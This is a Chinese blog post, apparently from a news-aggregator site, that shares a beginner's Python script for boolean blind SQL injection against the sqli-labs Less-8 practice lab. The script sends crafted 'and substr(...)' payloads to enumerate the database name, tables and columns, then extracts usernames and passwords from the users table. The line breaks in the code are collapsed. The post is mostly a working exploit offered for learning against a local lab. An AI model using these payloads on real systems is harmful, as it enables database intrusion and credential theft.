当前位置: 首页 > news >正文

sqli-labs_less8 布尔盲注脚本

news 2026/6/15 8:18:33

在我大一第一个寒假,从纯小白入门时在高铁上激情写出来的,适合新手学习,逻辑很简单,能锻炼你的初步代码能力和对sql注入的理解与利用,写完会有很大的成就感,make you confident

import requests
import stringurl='http://127.0.0.1/sqli/Less-8/'i=0
db_name_len=0
print('[+]正在猜解数据库长度......')
while True:payload=url+"?id=1'and length(database())=%d--+"%ires=requests.get(payload)#print(payload)if 'You are in...........' in res.text:db_name_len=iprint ('数据库长度为:'+str(db_name_len))breakif i==30:print('error!')breaki+=1print("[+]正在猜解数据库名字......")
db_name=''
for i in range(1,db_name_len+1):#print(i)for k in string.ascii_lowercase:#print(k)payload=url+"?id=1'and substr(database(),%d,1)='%s'--+"%(i,k)res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:db_name+=k#print(db_name)break
print("数据库为: %s"%db_name)#猜解几张表
print("[+]正在猜解表的数量......")
tab_num=0
while True:payload=url+"?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=%d--+"%tab_numres=requests.get(payload)if 'You are in...........' in res.text:print("%s数据库共有"%db_name+str(tab_num)+"张表")breakelse:tab_num+=1print("[+]开始猜解表名......")
for i in range(1,tab_num+1):tab_len=0while True:payload=url+"?id=1'and (select length(table_name) from information_schema.tables where table_schema='security' limit %d,1)=%d--+"%(i-1,tab_len)res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:#print ('第%d张表长度为:'%i+str(tab_len))breakif tab_len==30:print('error!')breaktab_len+=1tab_name=''for j in range(1,tab_len+1):for m in string.ascii_lowercase:payload=url+"?id=1'and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'--+"%(i-1,j,m)res=requests.get(payload)if 'You are in...........' in res.text:tab_name+=m#print (tab_name)print("[-]第%d张表名为: %s"%(i,tab_name))#尝试猜解表下字段......dump_num=0while True:payload=url+"?id=1'and (select count(column_name) from information_schema.columns where table_name='%s')=%d--+"%(tab_name,dump_num)res=requests.get(payload)if 'You are in...........' in res.text:print("%s表下有%d个字段"%(tab_name,dump_num))breakdump_num+=1for a in range(1,dump_num+1):dump_len=0while True:payload=url+"?id=1'and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d--+"%(tab_name,a-1,dump_len)      res=requests.get(payload)#print(payload)if 'You are in...........' in res.text:#print("第%d个字段长度为%d"%(a,dump_len))breakdump_len+=1if dump_len==30:print("error!!")breakdump_name=''for i in range(1,dump_len+1):for j in (string.ascii_lowercase+'_-'):payload=url+"?id=1'and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s'--+"%(tab_name,a-1,i,j)res=requests.get(payload)if 'You are in...........' in res.text:dump_name+=j#print(dump_name)breakprint(dump_name)
print("[+]开始猜解users表下的username......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-"
while True:payload=url+"?id=1'and (select count(username) from security.users)=%d--+"%usn_numres=requests.get(payload)if "You are in" in res.text:#print(usn_num)#13breakusn_num+=1
for i in range(1,usn_num+1):usn_len=0while True:payload=url+"?id=1'and (select length(username) from security.users limit %d,1)=%d--+"%(i-1,usn_len)res=requests.get(payload)if "You are in" in res.text:#print("第%d的长度为%d"%(i,usn_len))breakusn_len+=1usr_name=''for k in range(1,usn_len+1):for m in char:payload=url+"?id=1'and substr((select username from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)res = requests.get(payload)if "You are in" in res.text:usr_name+=mbreakprint(usr_name)print("[+]开始猜解users表下的password......")
usn_num=0
char="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-@!"
while True:payload=url+"?id=1'and (select count(password) from security.users)=%d--+"%usn_numres=requests.get(payload)if "You are in" in res.text:#print(usn_num)#13breakusn_num+=1
for i in range(1,usn_num+1):usn_len=0while True:payload=url+"?id=1'and (select length(password) from security.users limit %d,1)=%d--+"%(i-1,usn_len)res=requests.get(payload)if "You are in" in res.text:#print("第%d的长度为%d"%(i,usn_len))breakusn_len+=1usr_name=''for k in range(1,usn_len+1):for m in char:payload=url+"?id=1'and substr((select password from security.users limit %d,1),%d,1)='%s'--+"%(i-1,k,m)res = requests.get(payload)if "You are in" in res.text:usr_name+=mbreakprint(usr_name)
http://www.zskr.cn/news/37911.html

相关文章:

  • ST产品型号解析
  • conda使用记录
  • 题解:P4895 独钓寒江雪
  • 题解:CF1037E Trips
  • 题解:CF387E George and Cards
  • 题解:CF712D Memory and Scores
  • 拾壹月贰
  • [题解]CSP-S 2025 T1~T3 题解
  • CSP-S游记
  • NOIP 2025 游记 退役记
  • 一个万古常青的、小而美的输入法
  • 条件表达式中的赋值问题
  • Jenkins-CICD项目自动化部署
  • 第k小的数的分治算法
  • 一个灵感:思维的断章
  • 10.30总结
  • 世界计划:无法歌唱的初音未来
  • 一、RK3562板卡上手
  • 2025 年 11 月数控激光去毛刺机,冲压件去毛刺机,精密去毛刺机厂家最新推荐,实力品牌深度解析采购无忧之选!
  • AT ARC156C Tree and LCS 题解
  • CSPT漏洞浅析
  • Awesome Neovim - 精选Neovim插件大全
  • 不会AI编程?没关系!这几个框架也让你也能开发AI聊天助手!
  • 别只怪客户端宕机!还有这些导致 Redis 分布式锁“死锁”的原因 - 公众号
  • 第13天(中等题 滑动窗口)
  • 我重生了,重生到了CSP前——高中物理电学速通
  • 第二章算法作业
  • Linux模板机优化实操
  • 渗透知识靶场实战
  • 游记 CSP-S2025